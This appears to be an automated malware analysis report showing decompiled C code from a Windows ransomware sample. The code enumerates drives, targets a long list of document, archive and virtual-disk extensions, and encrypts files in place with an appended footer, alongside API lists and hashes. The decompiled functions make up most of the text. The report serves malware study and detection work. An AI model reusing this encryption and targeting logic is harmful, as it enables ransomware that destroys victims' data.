API ID: LibraryLoadVirtual$AddressAllocFreeHandleModuleProc
String ID: Advapi32.dll$CryptGenRandomAdvapi32.dll
API String ID: 4081504000-2152921537
Opcode ID: f3471da26f4c66e4957024e706a2b8487f41ab68a51c41aefc7591aa8d1a89b5
Instruction ID: 9d09a459e82a4aa1c53f6eefd00b40fd54d7cd08dee65ef3e02e5a3c093835b1
Opcode Fuzzy Hash: f3471da26f4c66e4957024e706a2b8487f41ab68a51c41aefc7591aa8d1a89b5
Instruction Fuzzy Hash: 6431B436A0424AAADF149FE1DC85AEF7B78EF04714F10416EF901B7690EB349A45CB58

Uniqueness

Uniqueness Score: 100.00%

Function 00403E7D, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 116
threadsynchronizationUNIQUE

Download Yara Rule

C-Code - Quality: 71%

			E00403E7D(void* __ebx, void* __edi, void* __eflags, intOrPtr _a4) {
				char _v8;
				struct _SECURITY_ATTRIBUTES* _v12;
				char _v16;
				long _v20;
				void* _v24;
				char _v28;
				intOrPtr _v32;
				signed int _v36;
				void* _t30;
				void* _t33;
				void* _t35;
				HANDLE* _t37;
				char _t38;
				void* _t45;
				intOrPtr* _t46;
				void* _t50;
				HANDLE* _t52;
				long _t62;
				signed int _t69;
				struct _SECURITY_ATTRIBUTES* _t70;
				void* _t73;
				void* _t75;
				signed int _t76;
				void* _t77;
				intOrPtr* _t78;

				_t30 = E0040C6BA(8); // executed
				_t75 = _t30;
				 *_t78 = 0x6fb89af0;
				_push(1);
				 *((intOrPtr*)(_t75 + 4)) = _a4;
				E004010BB(__ebx);
				_t33 = CreateThread(0, 0, E00403FA7, _t75, 0, 0); // executed
				_v24 = _t33;
				_t35 = E00401FB8( &_v36); // executed
				if(_t35 != 0) {
					_t76 = _v36;
					_push(__ebx);
					_t37 = E0040C6BA(_t76 << 2); // executed
					_t52 = _t37;
					_v16 = 0x5c3a41;
					_t38 = _v28;
					_t70 = 0;
					_v12 = 0;
					_v8 = _t38;
					if(_t38 != 0) {
						do {
							_t62 = 0;
							_t73 = 0;
							_v20 = 0;
							if(_t76 != 0) {
								while(1) {
									_v16 =  *((intOrPtr*)(_v32 + _t70));
									_v12 = _t70 + 1;
									_t45 = E0040C6BA(8); // executed
									 *_t78 = 0x2ca5f366;
									_t77 = _t45;
									_t46 = E004010BB(_t52);
									_t15 =  &_v16; // 0x5c3a41
									 *_t46(_t77, _t15, 1);
									 *((intOrPtr*)(_t77 + 4)) = _a4;
									E004010BB(_t52, 1, 0x6fb89af0);
									_t50 = CreateThread(0, 0, E0040203B, _t77, 0, 0); // executed
									_t69 = _v20;
									_t76 = _v36;
									_t52[_t69] = _t50;
									_t62 = _t69 + 1;
									_t22 =  &_v8;
									 *_t22 = _v8 - 1;
									_v20 = _t62;
									if( *_t22 == 0) {
										goto L6;
									}
									_t70 = _v12;
									_t73 = _t73 + 1;
									if(_t73 < _t76) {
										continue;
									}
									goto L6;
								}
							}
							L6:
							WaitForMultipleObjects(_t62, _t52, 1, 0xffffffff);
							_t70 = _v12;
						} while (_v8 != 0);
					}
					WaitForSingleObject(_v24, 0xffffffff);
					E0040C6D1(_v32);
					E0040C6D1(_t52);
				}
				return 0;
			}

0x00403e86
0x00403e8b
0x00403e8d
0x00403e97
0x00403e99
0x00403e9c
0x00403eb1
0x00403eb3
0x00403eba
0x00403ec2
0x00403ec8
0x00403ed0
0x00403ed2
0x00403ed7
0x00403ed9
0x00403ee0
0x00403ee3
0x00403ee5
0x00403ee8
0x00403eee
0x00403ef5
0x00403ef5
0x00403ef7
0x00403ef9
0x00403efe
0x00403f00
0x00403f09
0x00403f0c
0x00403f0f
0x00403f14
0x00403f1b
0x00403f1f
0x00403f26
0x00403f2b
0x00403f37
0x00403f3a
0x00403f4d
0x00403f4f
0x00403f52
0x00403f55
0x00403f58
0x00403f59
0x00403f59
0x00403f5d
0x00403f60
0x00000000
0x00000000
0x00403f62
0x00403f65
0x00403f68
0x00000000
0x00000000
0x00000000
0x00403f68
0x00403f00
0x00403f6a
0x00403f70
0x00403f7a
0x00403f7a
0x00403f83
0x00403f89
0x00403f92
0x00403f98
0x00403f9f
0x00403fa6

APIs

Part of subcall function 0040C6BA: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,00403FBE,00000202), ref: 0040C6C9

Part of subcall function 004010BB: LoadLibraryA.KERNEL32(15595754,?,00000000), ref: 0040136B

CreateThread.KERNELBASE(00000000,00000000,Function_00003FA7,00000000,00000000,00000000,00000000,?,?,?,?,?,00403BAA,?), ref: 00403EB1

Part of subcall function 00401FB8: GetDriveTypeA.KERNELBASE(A:\), ref: 00402011

CreateThread.KERNELBASE(00000000,00000000,Function_0000203B,00000000,00000000,00000000,?,00008000), ref: 00403F4D
WaitForMultipleObjects.KERNEL32(00000000,00000000,00000001,000000FF), ref: 00403F70
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00403F89

Part of subcall function 0040C6D1: VirtualFree.KERNELBASE(00000000,00000000,00008000,?,00408010,00000000,?,?,00408ACF,?,00000000,00000000,00000000), ref: 0040C6DE

Strings

A:\, xrefs: 00403F26, 00403F29

Memory Dump Source

Source File: 00000005.00000002.1855704108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1855692711.00400000.00000002.sdmp Download File
Associated: 00000005.00000002.1855724332.00411000.00000002.sdmp Download File
Associated: 00000005.00000002.1855736795.00413000.00000004.sdmp Download File
Associated: 00000005.00000002.1855752485.0041A000.00000002.sdmp Download File

Similarity

API ID: CreateThreadVirtualWait$AllocDriveFreeLibraryLoadMultipleObjectObjectsSingleType
String ID: A:\
API String ID: 3586297620-3379428675
Opcode ID: aa4bafa7ae816052c26e5115772d39fc274f5754d247ddbceeefb3bfe89834fe
Instruction ID: 8deec3133a5afa031f187992b58d37811c25f30e6a0de1152664b4074a7f2b06
Opcode Fuzzy Hash: aa4bafa7ae816052c26e5115772d39fc274f5754d247ddbceeefb3bfe89834fe
Instruction Fuzzy Hash: 2231C671D04215AFDB18AFA5CC86BAF7BB8EF44710F10862EF411B72C1DA7569408758

Uniqueness

Uniqueness Score: 100.00%

Function 00403AEE, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72
UNIQUE

Download Yara Rule

C-Code - Quality: 100%

			E00403AEE(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
				char _v8;
				char _v12;
				void* _v16;
				void* _v20;
				void* _t19;
				intOrPtr* _t21;
				void* _t23;
				void* _t25;
				void* _t36;
				void* _t42;
				void* _t49;

				_t49 = __eflags;
				_t42 = __edi;
				_t36 = __ecx;
				E00408CDE(5, 0xa); // executed
				E00401CC6();
				_t19 = E00407A91(_t49,  &_v20,  &_v16,  &_v8,  &_v12); // executed
				_t50 = _t19;
				if(_t19 != 0) {
					_t21 = E0040C6BA(0xa04); // executed
					_t44 = _t21;
					_t23 = E004021A8(_t36, _t50,  &_v20, _t21); // executed
					if(_t23 != 0) {
						if(_v16 != 0) {
							E0040C437(_v16, _v12);
							VirtualUnlock(_v16, 0x800);
							VirtualFree(_v16, 0, 0x8000); // executed
						}
						_t25 = E00404066(_t44); // executed
						_t53 = _t25;
						if(_t25 != 0) {
							E0040451D(); // executed
							 *0x419878 = 0x413c70;
							 *0x41987c = 0x413ea8;
							 *0x419880 = L"? .1st .602 .docb .xlm .xlsx .xlsm .xltx .xltm .xlsb .xla .xlam .xll .xlw .ppt .pot .pps .pptx .pptm .potx .potm .ppam .ppsx .ppsm .sldx .sldm .xps .xls .xlt ._doc .dotm ._docx .abw .act .adoc .aim .ans .apkg .apt .asc .asc .ascii .ase .aty .awp .awt .aww .bad .bbs .bdp .bdr .bean .bib .bib .bibtex .bml .bna .boc .brx .btd .bzabw .calca .charset .chart .chord .cnm .cod .crwl .cws .cyi .dca .dfti .dgs .diz .dne .dot .doc .docm .dotx .docx .docxml .docz .dox .dropbox .dsc .dvi .dwd .dx .dxb .dxp .eio .eit .emf .eml .emlx .emulecollection .epp .err .err .etf .etx .euc .fadein.template .faq .fbl .fcf .fdf .fdr .fds .fdt .fdx .fdxt .fft .fgs .flr .fodt .fountain .fpt .frt .fwd .fwdn .gmd .gpd .gpn .gsd .gthr .gv .hbk .hht .hs .hwp .hwp .hz .idx .iil .ipf .ipspot .jarvis .jis .jnp .joe .jp1 .jrtf .jtd .kes .klg .klg .knt .kon .kwd .latex .lbt .lis .lnt .log .lp2 .lst .lst .ltr .ltx .lue .luf .lwp .lxfml .lyt .lyx .man .mbox .mcw .md5 .me .mell .mellel .min .mnt .msg .mw .mwd .mwp .nb .ndoc .nfo .ngloss .njx .note .notes .now .nwctxt .nwm .nwp .ocr .odif .odm .odo .odt .ofl .opeico .openbsd .ort .ott .p7s .pages .pages-tef .pdpcmd .pfx .pjt .plain .plantuml .pmo .prt .prt .psw .pu .pvj .pvm .pwd .pwdp .pwdpl .pwi .pwr .qdl .qpf .rad .readme .rft .ris .rpt .rst .rtd .rtf .rtfd .rtx .run .rvf .rzk .rzn .saf .safetext .sam .sam .save .scc .scm .scriv .scrivx .sct .scw .sdm .sdoc .sdw .se .session .sgm .sig .skcard .sla .sla.gz .smf .sms .ssa .story .strings .stw .sty .sublime-project .sublime-workspace .sxg .sxw .tab .tab .tdf .tdf .template .tex .text .textclipping .thp .tlb .tm .tmd .tmdx .tmv .tmvx .tpc .trelby .tvj .txt .u3i .unauth .unx .uof .uot .upd .utf8 .utxt .vct .vnt .vw .wbk .webdoc .wn .wp .wp4 .wp5 .wp6 .wp7 .wpa .wpd .wpd .wpd .wpl .wps .wps .wpt .wpt .wpw .wri .wsd .wtt .wtx .xbdoc .xbplate .xdl .xdl .xwp .xwp .xwp .xy .xy3 .xyp .xyw .zabw .zrtf .zw "; // executed
							E00403E7D(0x8000, _t42, _t53,  &_v20); // executed
						}
						VirtualFree(_v20, 0, 0x8000);
					}
					E0040C6D1(_t44);
				}
				return 0;
			}

0x00403aee
0x00403aee
0x00403aee
0x00403af8
0x00403afd
0x00403b12
0x00403b1a
0x00403b1c
0x00403b28
0x00403b2d
0x00403b34
0x00403b3e
0x00403b4a
0x00403b52
0x00403b61
0x00403b6d
0x00403b6d
0x00403b74
0x00403b7a
0x00403b7c
0x00403b7e
0x00403b86
0x00403b91
0x00403b9b
0x00403ba5
0x00403baa
0x00403bb1
0x00403bb7
0x00403bb9
0x00403bbf
0x00403bc5

APIs

Part of subcall function 00408CDE: wsprintfW.USER32 ref: 00408D36
Part of subcall function 00408CDE: lstrlenW.KERNEL32(0658FFFE), ref: 00408D61
Part of subcall function 00408CDE: lstrlenW.KERNEL32(06590000), ref: 00408DCD

Part of subcall function 00407A91: VirtualAlloc.KERNELBASE(00000000,00000400,00003000,00000004,?,?,?,?,00403B17,?,?,?,?,00000005,0000000A), ref: 00407AAC
Part of subcall function 00407A91: VirtualAlloc.KERNELBASE(00000000,00000800,00003000,00000004,?,?,?,?,00403B17,?,?,?,?,00000005,0000000A), ref: 00407ABD
Part of subcall function 00407A91: VirtualLock.KERNEL32(00000000,00000800), ref: 00407ACB
Part of subcall function 00407A91: VirtualFree.KERNEL32(00000005,00000000,00008000,?,?,00000005,0000000A), ref: 00407AFF
Part of subcall function 00407A91: VirtualFree.KERNEL32(?,00000000,00008000), ref: 00407B0A

Part of subcall function 0040C6BA: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,00403FBE,00000202), ref: 0040C6C9

VirtualUnlock.KERNEL32(00000000,00000800), ref: 00403B61
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00403B6D

Part of subcall function 00404066: lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,?,00008000), ref: 004042CA
Part of subcall function 00404066: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,06660000,?,?,?,?,?,?,?,?,?,?,00008000), ref: 004042F7
Part of subcall function 00404066: lstrlenW.KERNEL32 ref: 00404485

VirtualFree.KERNEL32(?,00000000,00008000), ref: 00403BB1

Part of subcall function 00403E7D: CreateThread.KERNELBASE(00000000,00000000,Function_00003FA7,00000000,00000000,00000000,00000000,?,?,?,?,?,00403BAA,?), ref: 00403EB1
Part of subcall function 00403E7D: CreateThread.KERNELBASE(00000000,00000000,Function_0000203B,00000000,00000000,00000000,?,00008000), ref: 00403F4D
Part of subcall function 00403E7D: WaitForMultipleObjects.KERNEL32(00000000,00000000,00000001,000000FF), ref: 00403F70
Part of subcall function 00403E7D: WaitForSingleObject.KERNEL32(?,000000FF), ref: 00403F89

Part of subcall function 0040C6D1: VirtualFree.KERNELBASE(00000000,00000000,00008000,?,00408010,00000000,?,?,00408ACF,?,00000000,00000000,00000000), ref: 0040C6DE

Strings

? .1st .602 .docb .xlm .xlsx .xlsm .xltx .xltm .xlsb .xla .xlam .xll .xlw .ppt .pot .pps .pptx .pptm .potx .potm .ppam .ppsx .ppsm, xrefs: 00403B9B
? .rar .zip .cab .arj .lzh .tar .7z .gzip .iso .z .7-zip .lzma .vmx .vmdk .vmem .vdi .vbo, xrefs: 00403B91

Memory Dump Source

Source File: 00000005.00000002.1855704108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1855692711.00400000.00000002.sdmp Download File
Associated: 00000005.00000002.1855724332.00411000.00000002.sdmp Download File
Associated: 00000005.00000002.1855736795.00413000.00000004.sdmp Download File
Associated: 00000005.00000002.1855752485.0041A000.00000002.sdmp Download File

Similarity

API ID: Virtual$Free$lstrlen$Alloc$CreateThreadWait$ByteCharLockMultiMultipleObjectObjectsSingleUnlockWidewsprintf
String ID: ? .1st .602 .docb .xlm .xlsx .xlsm .xltx .xltm .xlsb .xla .xlam .xll .xlw .ppt .pot .pps .pptx .pptm .potx .potm .ppam .ppsx .ppsm$? .rar .zip .cab .arj .lzh .tar .7z .gzip .iso .z .7-zip .lzma .vmx .vmdk .vmem .vdi .vbo
API String ID: 1855382610-32337206
Opcode ID: 8cb4cfa73f04439b71629ede0eb7563c4be86a5cf3d72650550776f62a87f8ba
Instruction ID: 456ed43f077a1dffc92f46f857f75149b42bfbd489f05222ccc7cebbebec3a30
Opcode Fuzzy Hash: 8cb4cfa73f04439b71629ede0eb7563c4be86a5cf3d72650550776f62a87f8ba
Instruction Fuzzy Hash: 28116272900208BADB10ABA1DC46BDF7BBCEB05345F10417BF611B51D1EB796A448BAD

Uniqueness

Uniqueness Score: 100.00%

Function 00401720, Relevance: 7.8, APIs: 5, Instructions: 262
fileUNIQUE

Download Yara Rule

C-Code - Quality: 88%

			E00401720(void* __edx, WCHAR* _a4, intOrPtr _a8, struct _OVERLAPPED* _a16, intOrPtr _a20, signed int* _a24) {
				long _v8;
				struct _OVERLAPPED* _v12;
				struct _OVERLAPPED* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				signed int _v32;
				long _v36;
				char _v44;
				char _v76;
				char _v140;
				void* __ebx;
				void* _t60;
				void* _t62;
				struct _OVERLAPPED* _t64;
				signed int* _t65;
				void* _t67;
				int _t70;
				void* _t81;
				void* _t82;
				int _t84;
				struct _OVERLAPPED* _t86;
				struct _OVERLAPPED* _t88;
				int _t92;
				struct _OVERLAPPED* _t99;
				int _t101;
				intOrPtr* _t102;
				int _t107;
				intOrPtr _t109;
				intOrPtr* _t110;
				void* _t144;
				void* _t145;
				void* _t147;
				void* _t148;
				void* _t153;
				void* _t154;
				void* _t155;
				void* _t156;

				_t144 = __edx;
				_t114 = 0;
				_v8 = 0;
				_t60 = E0040C6BA(0x21c); // executed
				_t145 = _t60;
				_v16 = _t145;
				if(_t145 != 0) {
					E004010BB(0, 1, 0x8f8f102);
					_t117 = _t147;
					_t62 = CreateFileW(_a4, 0xc0000000, 0, 0, 3, 0x88000000, 0); // executed
					_t148 = _t62;
					_v28 = _t148;
					if(_t148 == 0xffffffff) {
						L28:
						E0040C6D1(_t145); // executed
						__eflags = _t148 - 0xffffffff;
						if(_t148 != 0xffffffff) {
							_t65 = _a24;
							 *_t65 =  *_t65 | 0xffffffff;
							__eflags =  *_t65;
							E0040162C(_t148);
						}
						_t64 = _t114;
						L31:
						return _t64;
					}
					_t67 = E00401608(_t148, 0xfffffde4, 0xffffffff, 0, 2); // executed
					_t154 = _t153 + 0x14;
					if(_t67 == 0) {
						L8:
						_v8 = _t114;
						_t70 = E00401644(_t117, __eflags,  &_v76,  &_v44, _t145, _a8); // executed
						_t155 = _t154 + 0x10;
						__eflags = _t70;
						if(_t70 != 0) {
							E0040C437( &_v140, 0x40);
							_push(0x40);
							E00407C9C( &_v140,  &_v76, 0x100);
							E00407C7E( &_v140,  &_v44);
							_t81 = E0040C6BA( *(_t145 + 0x210) + 1); // executed
							_t121 =  *(_t145 + 0x210) + 5;
							__eflags =  *(_t145 + 0x210) + 5;
							_v20 = _t81;
							_t82 = E0040C6BA(_t121); // executed
							_t156 = _t155 + 0x28;
							_v24 = _t82;
							_v12 = _t114;
							do {
								E004010BB(_t114, 1, 0x487fe16b);
								_t148 = _v28;
								_t84 = ReadFile(_t148, _v20,  *(_t145 + 0x210),  &_v8, _t114); // executed
								__eflags = _t84;
								if(_t84 == 0) {
									L23:
									_t86 = 1;
									__eflags = 1;
									_v12 = 1;
									goto L24;
								}
								_t92 = _v8;
								__eflags = _t92;
								if(_t92 == 0) {
									goto L23;
								}
								__eflags = _t92 -  *(_t145 + 0x210);
								if(_t92 <  *(_t145 + 0x210)) {
									__eflags = 1;
									_v12 = 1;
								}
								__eflags = _a16 - _t114;
								if(_a16 != _t114) {
									_v12 = _a16;
								}
								_t37 = _t145 + 0x200;
								 *_t37 =  *(_t145 + 0x200) + _t92;
								__eflags =  *_t37;
								asm("adc [edi+0x204], ebx");
								_t93 = _v8;
								_v32 = _v8;
								E00407BD4( &_v140, _v20, _v24, _t93);
								asm("cdq");
								E00401608(_t148,  ~_v32, _t144, _t114, 1); // executed
								_t156 = _t156 + 0x24;
								_v16 = _t114;
								_t99 = _t114;
								while(1) {
									__eflags = _t99 - 2;
									if(_t99 >= 2) {
										goto L25;
									}
									E004010BB(_t114, 1, 0xf3fd1c3);
									_t101 = WriteFile(_t148, _v24, _v32,  &_v36, _t114); // executed
									__eflags = _t101;
									if(_t101 != 0) {
										 *((intOrPtr*)(_t145 + 0x208)) =  *((intOrPtr*)(_t145 + 0x208)) + 1;
										_t86 = _v12;
										asm("adc [edi+0x20c], ebx");
										goto L24;
									}
									_t102 = E004010BB(_t114, 1, 0x3d9972f5);
									 *_t102(0x64);
									_t99 =  &(_v16->Internal);
									_v16 = _t99;
								}
								break;
								L24:
								__eflags = _t86;
							} while (_t86 == 0);
							L25:
							__eflags = _a16 - _t114;
							if(_a16 != _t114) {
								E00401608(_t148, _t114, _t114, _t114, 2); // executed
							}
							E004010BB(_t114, 1, 0xf3fd1c3);
							_t88 = WriteFile(_t148, _t145, 0x21c,  &_v36, _t114); // executed
							_t114 = _t88; // executed
							E0040C6D1(_v20); // executed
							E0040C6D1(_v24); // executed
							goto L28;
						}
						E0040C6D1(_t145);
						L10:
						_t64 = 0;
						goto L31;
					}
					E004010BB(0, 1, 0x487fe16b);
					_t117 =  &_v8;
					_t107 = ReadFile(_t148, _t145, 0x21c,  &_v8, 0); // executed
					if(_t107 == 0 ||  *((intOrPtr*)(_t145 + 0x214)) != 0x93892918 ||  *((intOrPtr*)(_t145 + 0x218)) != 0x38281) {
						E00401608(_t148, _t114, _t114, _t114, _t114); // executed
						_t154 = _t154 + 0x14;
						goto L8;
					} else {
						_t109 = _a20;
						_t110 = E004010BB(0, 1, 0x5603c951);
						_t152 = _v28;
						 *_t110(_v28, 0, 0,  *((intOrPtr*)(_t109 + 0x20)),  *((intOrPtr*)(_t109 + 0x1c)));
						E0040162C(_t152);
						E0040C6D1(_v16);
						goto L10;
					}
				}
				return _t60;
			}

0x00401720
0x0040172b
0x00401732
0x00401735
0x0040173a
0x0040173c
0x00401742
0x00401750
0x00401756
0x00401769
0x0040176b
0x0040176d
0x00401773
0x004019bd
0x004019be
0x004019c4
0x004019c7
0x004019c9
0x004019cd
0x004019cd
0x004019d0
0x004019d5
0x004019d6
0x004019d8
0x00000000
0x004019d8
0x00401784
0x00401789
0x0040178e
0x00401807
0x0040180d
0x00401816
0x0040181b
0x0040181e
0x00401820
0x00401839
0x0040183e
0x00401850
0x00401860
0x0040186d
0x00401878
0x00401878
0x0040187b
0x0040187f
0x00401884
0x00401887
0x0040188a
0x0040188d
0x0040189a
0x004018aa
0x004018ae
0x004018b0
0x004018b2
0x0040196c
0x0040196e
0x0040196e
0x0040196f
0x00000000
0x0040196f
0x004018b8
0x004018bb
0x004018bd
0x00000000
0x00000000
0x004018c3
0x004018c9
0x004018cd
0x004018ce
0x004018ce
0x004018d1
0x004018d4
0x004018d9
0x004018d9
0x004018dc
0x004018dc
0x004018dc
0x004018e2
0x004018e8
0x004018ef
0x004018fc
0x00401908
0x0040190d
0x00401912
0x00401915
0x00401918
0x0040191a
0x0040191a
0x0040191d
0x00000000
0x00000000
0x00401926
0x00401939
0x0040193b
0x0040193d
0x0040195a
0x00401961
0x00401964
0x00000000
0x00401964
0x00401946
0x0040194f
0x00401954
0x00401955
0x00401955
0x00000000
0x00401972
0x00401972
0x00401972
0x0040197a
0x0040197a
0x0040197d
0x00401985
0x0040198a
0x00401994
0x004019a7
0x004019ac
0x004019ae
0x004019b6
0x00000000
0x004019bc
0x00401823
0x00401828
0x00401829
0x00000000
0x00401829
0x00401797
0x0040179f
0x004017aa
0x004017ae
0x004017ff
0x00401804
0x00000000
0x004017c8
0x004017c8
0x004017d8
0x004017e0
0x004017e7
0x004017ea
0x004017f2
0x00000000
0x004017f7
0x004017ae
0x004019de

APIs

Part of subcall function 0040C6BA: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,00403FBE,00000202), ref: 0040C6C9

Part of subcall function 004010BB: LoadLibraryA.KERNEL32(15595754,?,00000000), ref: 0040136B

CreateFileW.KERNELBASE(?,C0000000,00000000,00000000,00000003,88000000,00000000,00000010,00000000,00000000), ref: 00401769
ReadFile.KERNELBASE(00000000,00000000,0000021C,?,00000000), ref: 004017AA
ReadFile.KERNELBASE(00000010,77D66200,?,?,00000000), ref: 004018AE
WriteFile.KERNELBASE(00000010,00408C89,00408243,?,00000000), ref: 00401939
WriteFile.KERNELBASE(00000010,00000000,0000021C,?,00000000), ref: 004019A7

Part of subcall function 0040C6D1: VirtualFree.KERNELBASE(00000000,00000000,00008000,?,00408010,00000000,?,?,00408ACF,?,00000000,00000000,00000000), ref: 0040C6DE

Part of subcall function 00401608: SetFilePointerEx.KERNELBASE(00000000,000000FF,FFFFFDE4,00000000,00401789,?,00401789,00000000,FFFFFDE4,000000FF,00000000,00000002), ref: 00401628

Memory Dump Source

Source File: 00000005.00000002.1855704108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1855692711.00400000.00000002.sdmp Download File
Associated: 00000005.00000002.1855724332.00411000.00000002.sdmp Download File
Associated: 00000005.00000002.1855736795.00413000.00000004.sdmp Download File
Associated: 00000005.00000002.1855752485.0041A000.00000002.sdmp Download File

Similarity

API ID: File$ReadVirtualWrite$AllocCreateFreeLibraryLoadPointer
String ID:
API String ID: 639033228-0
Opcode ID: 820400e49ef6efdf08277ad52f980d56547db0ec882ae6e1ad04176778f16a31
Instruction ID: 5acd0d641cf3536763b04351ace754f5b425c26413308d3ee41fd3934973b791
Opcode Fuzzy Hash: 820400e49ef6efdf08277ad52f980d56547db0ec882ae6e1ad04176778f16a31
Instruction Fuzzy Hash: CD81D5B2900209BFDB15ABA58C86EEF777CEF04314F10412BF514B21D1EA799E418BA9

Uniqueness

Uniqueness Score: 100.00%

Function 00407A91, Relevance: 7.6, APIs: 5, Instructions: 55
memoryUNIQUE

Download Yara Rule

C-Code - Quality: 100%

			E00407A91(void* __eflags, void** _a4, void** _a8, long* _a12, long* _a16) {
				void* _t5;
				void* _t6;
				long _t9;
				void** _t16;
				void** _t18;
				void* _t24;

				_t24 = __eflags;
				_t5 = VirtualAlloc(0, 0x400, 0x3000, 4); // executed
				_t18 = _a4;
				 *_t18 = _t5; // executed
				_t6 = VirtualAlloc(0, 0x800, 0x3000, 4); // executed
				_t16 = _a8;
				 *_t16 = _t6;
				VirtualLock(_t6, 0x800);
				_t17 = _a12;
				_t8 = _a16;
				 *_a12 = 0x400;
				 *_a16 = 0x800;
				_t9 = E00407B18(_t24,  *_t18, _t17,  *_t16, _t8); // executed
				if(_t9 != 0) {
					__eflags = 1;
					return 1;
				}
				VirtualFree( *_t18, _t9, 0x8000);
				VirtualFree( *_t16, 0, 0x8000);
				return 0;
			}

0x00407a91
0x00407aac
0x00407aae
0x00407abb
0x00407abd
0x00407abf
0x00407ac9
0x00407acb
0x00407ad1
0x00407ad4
0x00407ad8
0x00407ade
0x00407ae5
0x00407aef
0x00407b12
0x00000000
0x00407b12
0x00407aff
0x00407b0a
0x00000000

APIs

VirtualAlloc.KERNELBASE(00000000,00000400,00003000,00000004,?,?,?,?,00403B17,?,?,?,?,00000005,0000000A), ref: 00407AAC
VirtualAlloc.KERNELBASE(00000000,00000800,00003000,00000004,?,?,?,?,00403B17,?,?,?,?,00000005,0000000A), ref: 00407ABD
VirtualLock.KERNEL32(00000000,00000800), ref: 00407ACB
VirtualFree.KERNEL32(00000005,00000000,00008000,?,?,00000005,0000000A), ref: 00407AFF
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00407B0A

Memory Dump Source

Source File: 00000005.00000002.1855704108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1855692711.00400000.00000002.sdmp Download File
Associated: 00000005.00000002.1855724332.00411000.00000002.sdmp Download File
Associated: 00000005.00000002.1855736795.00413000.00000004.sdmp Download File
Associated: 00000005.00000002.1855752485.0041A000.00000002.sdmp Download File

Similarity

API ID: Virtual$AllocFree$Lock
String ID:
API String ID: 3714610962-0
Opcode ID: 211eac2cff47c8c44f33ffc854464ac16ee1f7db6171efb69684e3ab2dee970e
Instruction ID: 30b1d43aef037221c0f7b69453cd7f72759a4f010ba70fd343523be67216f96e
Opcode Fuzzy Hash: 211eac2cff47c8c44f33ffc854464ac16ee1f7db6171efb69684e3ab2dee970e
Instruction Fuzzy Hash: C0014CB1A40214BFEB105F65CC41F963FACEB497A8F204462FB04AB294D6B17C108BA9

Uniqueness

Uniqueness Score: 100.00%

Function 004096FA, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 247
stringUNIQUE

Download Yara Rule

C-Code - Quality: 100%

			E004096FA(intOrPtr* __ecx, void* __eflags, WCHAR* _a4) {
				intOrPtr _v8;
				WCHAR* _v12;
				char _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				char _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				char _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				char _v128;
				intOrPtr _t89;
				WCHAR* _t99;
				void* _t143;
				intOrPtr* _t154;
				WCHAR* _t155;
				void* _t156;

				_v56 = 0xbdf4cc41;
				_t154 = __ecx;
				_v52 = 0xc7c1a481;
				_v48 = 0xa810553d;
				_v44 = 0xc6d824b;
				_v40 = 0x17bc1165;
				_v36 = 0x17bc1161;
				_v32 = 0xc22dc15f;
				_t143 = E00407563( &_v56);
				_v84 = 0x857999d4;
				_v80 = 0x1390bb62;
				_v76 = 0xbb41b596;
				_v72 = 0x7e7ee316;
				_v68 = 0x9ad7e013;
				_v64 = 0x9ad7e017;
				_v60 = 0xd73bd7e5;
				_t89 = E00407563( &_v84);
				_t155 = _a4;
				_v8 = _t89;
				if( *((intOrPtr*)(_t154 + 0x80)) != 0) {
					E00401A92(_t155,  *((intOrPtr*)(_t154 + 0x88)));
					E00401A92(_t155, _t143);
					E00401A92(_t155,  *((intOrPtr*)(_t154 + 0x84)));
					E00401A92(_t155, _v8);
					_t156 = _t156 + 0x20;
				}
				if( *_t154 != 0) {
					E00401A92(_t155,  *((intOrPtr*)(_t154 + 4)));
					E00401A92(_t155, _t143);
					E00401A92(_t155,  *((intOrPtr*)(_t154 + 8)));
					E00401A92(_t155, _v8);
					_t156 = _t156 + 0x20;
				}
				if( *((intOrPtr*)(_t154 + 0xc)) != 0) {
					E00401A92(_t155,  *((intOrPtr*)(_t154 + 0x10)));
					E00401A92(_t155, _t143);
					E00401A92(_t155,  *((intOrPtr*)(_t154 + 0x14)));
					E00401A92(_t155, _v8);
					_t156 = _t156 + 0x20;
				}
				if( *((intOrPtr*)(_t154 + 0x18)) != 0) {
					E00401A92(_t155,  *((intOrPtr*)(_t154 + 0x1c)));
					E00401A92(_t155, _t143);
					E00401A92(_t155,  *((intOrPtr*)(_t154 + 0x20)));
					E00401A92(_t155, _v8);
					_t156 = _t156 + 0x20;
				}
				if( *((intOrPtr*)(_t154 + 0x24)) != 0) {
					E00401A92(_t155,  *((intOrPtr*)(_t154 + 0x28)));
					E00401A92(_t155, _t143);
					E00401A92(_t155,  *((intOrPtr*)(_t154 + 0x2c)));
					E00401A92(_t155, _v8);
					_t156 = _t156 + 0x20;
				}
				if( *((intOrPtr*)(_t154 + 0x30)) != 0) {
					E00401A92(_t155,  *((intOrPtr*)(_t154 + 0x34)));
					E00401A92(_t155, _t143);
					E00401A92(_t155,  *((intOrPtr*)(_t154 + 0x38)));
					E00401A92(_t155, _v8);
					_t156 = _t156 + 0x20;
				}
